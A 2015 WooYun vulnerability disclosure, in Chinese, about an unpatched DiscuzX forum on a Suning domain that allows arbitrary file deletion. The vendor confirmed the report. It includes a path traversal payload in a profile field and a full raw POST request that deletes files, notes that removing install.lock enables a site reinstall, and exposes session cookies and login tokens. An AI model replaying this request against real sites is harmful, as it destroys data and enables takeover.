当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118763

漏洞标题:苏宁某站补丁不及时导致任意文件删除(可重装整站)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: 我是小号

提交时间:2015-06-08 14:21

修复时间:2015-07-23 15:18

公开时间:2015-07-23 15:18

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

苏宁某站补丁不及时可任意文件删除或重装整站

详细说明:

漏洞原理参考DiscuzX任意文件删除漏洞: 

 WooYun: DiscuzX 任意文件操作漏洞


————————————————————————————————
通过搜索发现suning.com下存在一个苏宁云台商家社区使用Discuzx2搭建的社区:
http://sopbbs.suning.com
目测这个站点没有及时打补丁,所以攻击者可以利用上面的漏洞可以删除该社区的整站数据,删除data/install.lock文件就可以整站重装
————————————————————————————————
1.先更新个人资料处“店铺”名为:

../../../robots.txt


000.png


2.提交下面的删除请求:

POST http://sopbbs.suning.com/home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bfield1%5D=aaaaaa HTTP/1.1
Host: sopbbs.suning.com
Connection: keep-alive
Content-Length: 573
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sopbbs.suning.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryknrVEN8vpBotf7fQ
Referer: http://sopbbs.suning.com/home.php?mod=spacecp&ac=profile&op=base
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: SN_CITY=100_025_1000173_9173_01_11365_2_0; cityId=9173; districtId=11365; pgv_pvi=850721792; sesabv=25%2350%3A50; sesab=b; __utma=1.1541753785.1433562056.1433570865.1433570865.1; __utmz=1.1433570865.1.1.utmcsr=baoxian.suning.com|utmccn=(referral)|utmcmd=referral|utmcct=/ins/index.htm; snbar=6; Hm_lvt_cb12e33a15345914e449a2ed82a2a216=1433566737,1433571713; cart_abtest_num=40; WC_PERSISTENT=dXCW0gvx2YYP5vAQuBEx5MbKWQs%3d%0a%3b2015%2d06%2d06+14%3a59%3a34%2e197%5f1433564897472%2d8159128%5f10052; smhst=123214772a101991647a127612134a127680293a125536310a126683612a125381002a123192521; _snAdId=14335796304256354; _snsr=www.suning.cn%7Creferral%7C%7C%7C; WC_SERVER=6; __wmv=1417928826.11; _customId=sgddccdd0561; _device_session_id=p_db790f4a-b22d-40c3-9293-c5a5e371b3a6; _snma=1%7C143356205591382429%7C1433562055913%7C1433643437899%7C1433643438272%7C531%7C20; _snmc=1; _snmp=143364343826996523; _snmb=143364324295187888%7C1433643438318%7C1433643438274%7C8; _ga=GA1.2.1541753785.1433562056; tjpctrl=1433645244153; R2RI_8947_saltkey=t688f3qk; R2RI_8947_lastvisit=1433639857; idsLoginUserIdLastTime=coolboyiswo%40sina.com; custno=6107252461; authId=si3FA0E734026E04CF8C6960AA99715AF9; R2RI_8947_auth=4361q0oGRfnSIlHiVWfEgLK5qRaHjRJntAhGvfANrmHIfJplPwaWph%2Brn20CrfNslyIA9LlsfVlsI3JW5GywEyIn; R2RI_8947_ulastactivity=8701l7buSJ15Q2JG8qw2V4lZl6RjcyjKjIBPHpyFmrQhKAUDvltE; R2RI_8947_nofavfid=1; R2RI_8947_forum_lastvisit=D_43_1433643504; R2RI_8947_visitedfid=43; R2RI_8947_smile=3D1; R2RI_8947_home_diymode=1; R2RI_8947_sendmail=1; R2RI_8947_checkpm=1; R2RI_8947_onlineusernum=24; R2RI_8947_lastact=1433644511%09forum.php%09forumdisplay; R2RI_8947_sid=EckIe1; SOP_USERACTIVITY_null=null
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="formhash"
14da2d9a
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="field1"
../../../robots.txt
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="privacy[field1]"
0
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="profilesubmit"
true
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="profilesubmitbtn"
true
------WebKitFormBoundaryknrVEN8vpBotf7fQ--


返回查看

http://sopbbs.suning.com/robots.txt


发现已经不存在了

漏洞证明:

1.删除的robots.txt

001.png


2.发送删除请求以后,robots.txt被成功删除:

002.png


漏洞利用只需要通过发送相同的请求,删除data/install.lock文件,就可以重装整个社区。

修复方案:

及时打上DiscuzX的升级补丁

版权声明:转载请注明来源 我是小号@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-08 15:17

厂商回复:

感谢提交,稍后送上500礼品卡。

最新状态:

暂无